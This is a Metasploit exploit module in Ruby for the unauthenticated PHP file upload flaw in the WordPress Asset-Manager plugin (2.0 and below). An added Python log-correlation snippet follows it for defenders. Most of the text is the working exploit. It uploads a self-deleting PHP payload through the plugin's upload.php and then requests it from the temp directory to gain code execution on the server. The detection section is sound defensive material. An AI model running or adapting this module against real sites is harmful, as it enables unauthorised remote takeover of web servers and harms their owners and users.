This Metasploit module exploits a vulnerability found in version 2.0 and below of the WordPress Asset-Manager plugin. The plugin allows PHP files to be uploaded: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    # PHP stub that writes out and runs the selected payload, then deletes itself
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart/form-data body; the plugin reads the file from the "Filedata" field
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # upload.php echoes the stored filename back on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The uploaded file lands in the plugin's temp directory and is fetched to trigger it
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'    => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method' => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
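From the defender's side, the module's two requests leave a distinctive pair of web-server log entries: an unauthenticated POST to the plugin's upload.php followed by a GET of a .php file under wp-content/uploads/assets/temp/ from the same client. The following added example (not part of the original post or of the Metasploit module) correlates those two events in access-log lines; the combined log format and the sample lines are constructed assumptions.

```python
import re

# Apache/nginx "combined" access-log layout (assumption about the site's logging).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
UPLOAD_PATH = "/wp-content/plugins/asset-manager/upload.php"  # from the module
TEMP_DIR = "/wp-content/uploads/assets/temp/"                 # from the module


def parse(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_upload_exec_chains(lines):
    """Return (ip, path) pairs where a client successfully POSTed to the
    Asset-Manager upload endpoint and later fetched a .php file from the
    plugin's temp directory. Lines are assumed to be in chronological order."""
    uploaders = set()
    hits = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if rec["method"] == "POST" and path.endswith(UPLOAD_PATH) and rec["status"] == "200":
            uploaders.add(rec["ip"])
        elif (rec["method"] == "GET" and TEMP_DIR in path
              and path.lower().endswith(".php") and rec["ip"] in uploaders):
            hits.append((rec["ip"], path))
    return hits


# Constructed sample log lines, not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/May/2012:10:01:02 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [26/May/2012:10:01:03 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzpt.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [26/May/2012:10:05:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/photo.jpg HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [26/May/2012:10:05:01 +0000] "GET /wordpress/wp-content/uploads/assets/temp/shell.php HTTP/1.1" 404 0 "-" "curl/7.0"',
]

if __name__ == "__main__":
    for ip, path in find_upload_exec_chains(SAMPLE_LOG):
        print(f"ALERT upload-then-execute from {ip}: {path}")
```

A .php request under the temp directory with no preceding upload from the same client is not flagged here; in practice any .php served from that directory is worth blocking at the web server, since the plugin has no reason to execute code there.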